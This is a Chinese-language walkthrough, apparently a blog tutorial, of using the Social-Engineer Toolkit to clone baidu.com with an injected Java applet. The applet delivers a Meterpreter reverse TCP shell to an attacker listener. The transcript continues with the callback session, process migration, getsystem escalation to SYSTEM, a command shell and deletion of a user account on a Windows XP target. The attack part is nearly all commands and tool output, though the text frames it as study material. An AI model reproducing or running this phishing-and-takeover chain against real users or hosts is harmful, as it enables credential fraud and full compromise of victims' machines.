set工具包中的web攻击向量,可以克隆出与实际的可信站点看起来一模一样的网页,这使得受害者认为他们正在浏览一个合法的站点。
本例子使用Java Applet攻击向量对用户进行欺骗
以下是具体步骤
setoolkit进入set工具包
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
urllib.error.URLError: <urlopen error [Errno 111] Connection refused>
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 2
....
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
99) Return to Main Menu
set:webattack>1
...
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.113]:
[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: XvOnfJKEK
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection
2) Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection
3) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
4) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
5) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
6) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
7) Import your own executable Specify a path for your own executable
8) Import your own commands.txt Specify payloads to be sent via command line
set:payloads>1
set:payloads> PORT of the listener [443]:
Select the payload you want to deliver via shellcode injection
1) Windows Meterpreter Reverse TCP
2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
4) Windows Meterpreter (ALL PORTS) Reverse TCP
set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[!] ERROR:Something is running on port 80. Attempting to see if we can stop Apache...
[!] Apache may be running, do you want SET to stop the process? [y/n]: y
[*] Attempting to stop apache.. One moment..
Stopping apache2 (via systemctl): apache2.service.
[*] Success! Apache was stopped. Moving forward within SET...
使用另一台靶机进行连接192.168.1.113:443网页,显示出百度页面,并且主机会有一个sessions出现,进入sessions即可控制靶机,具体过程如下
msf6 exploit(multi/handler) >
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.115:1133) at 2021-06-22 20:58:38 +0800
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/wind WINXP-1\st21 @ WINXP- 192.168.1.113:443 ->
ows 1 192.168.1.115:1133 (1
92.168.1.115)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter >
获取到meterpreter权限后进行跟进一步提权与其他操作(首先迁移进程,其次更换用户)
meterpreter > run post/windows/manage/migrate
[*] Running module against WINXP-1
[*] Current server process: SpVcICIXanGOf.exe (3028)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2432
[+] Successfully migrated into process 2432
meterpreter > getpid
Current pid: 2432
meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > uuid
[+] UUID: 918ed6d2b1ecf640/x86=1/windows=1/2021-06-22T12:58:36Z
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3512 created.
Channel 2 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\Documents and Settings\st21>net user
net user
\\WINXP-1 ���û��ʻ�
-------------------------------------------------------------------------------
__wfilterd_user Administrator Guest
hack HelpAssistant st21
SUPPORT_388945a0
�����ɹ����ɡ�
C:\Documents and Settings\st21>net user hack /del
net user hack /del
�����ɹ����ɡ�
C:\Documents and Settings\st21>net user
net user
\\WINXP-1 ���û��ʻ�
-------------------------------------------------------------------------------
__wfilterd_user Administrator Guest
HelpAssistant st21 SUPPORT_388945a0
�����ɹ����ɡ�
C:\Documents and Settings\st21>
本文简单介绍了使用set工具包的web攻击向量伪造网页进行欺骗渗透测试,仅供学习